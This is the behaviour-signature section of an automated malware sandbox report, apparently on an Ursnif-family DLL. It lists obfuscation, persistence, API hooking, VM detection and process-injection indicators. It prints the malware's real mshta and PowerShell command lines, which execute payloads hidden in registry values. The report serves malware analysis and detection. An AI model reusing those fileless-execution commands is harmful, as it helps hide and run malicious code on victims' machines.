Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000025.00000002.446580708.0000025B61C00000.00000002.00000001.sdmp, csc.exe, 00000027.00000002.452565551.000001A0C3C30000.00000002.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.pdb source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.pdb source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.pdbXPbs source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.pdbXPbs source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.cmdline'
PE file contains an invalid checksum
Source: 6006bde674be5pdf.dll Static PE information: real checksum: 0x30800 should be: 0x307ff
Source: cw4ltk3l.dll.37.dr Static PE information: real checksum: 0x0 should be: 0xfb16
Source: q35sbhot.dll.39.dr Static PE information: real checksum: 0x0 should be: 0xb818
PE file contains sections with non-standard names
Source: 6006bde674be5pdf.dll Static PE information: section name: .text4
Source: 6006bde674be5pdf.dll Static PE information: section name: .text6
Source: 6006bde674be5pdf.dll Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100020B3 push ecx; ret 0_2_100020C3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002060 push ecx; ret 0_2_10002069
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D8B0EB push ecx; ret 0_2_00D8B0FB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D8AD30 push ecx; ret 0_2_00D8AD39
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007EB700 push edx; ret 0_2_007EB804
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E241C push cx; iretd 0_2_007E2440
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3D69 push ss; iretd 0_2_007E3D80
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E11CA push eax; iretd 0_2_007E11CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E2E49 push B29E8F4Fh; ret 0_2_007E2E4E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E1606 push ecx; ret 0_2_007E1607
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E27D8 push AF3D99F0h; retf 0_2_007E27F5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E27B3 push AF3D99F0h; retf 0_2_007E27F5

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.267174512.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267021391.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267187434.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267110457.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267049482.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.412616743.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267090399.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267156690.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267129257.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6716, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6528, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\mshta.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5602
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D83771 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00D83771
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 9B851580
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES17C2.tmp' 'c:\Users\user\AppData\Local\Temp\cw4ltk3l\CSC9C603ACDE65242378EE2E6EB79AAF5F2.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D83F50 cpuid 0_2_00D83F50
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001CBE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_10001CBE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D83F50 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00D83F50
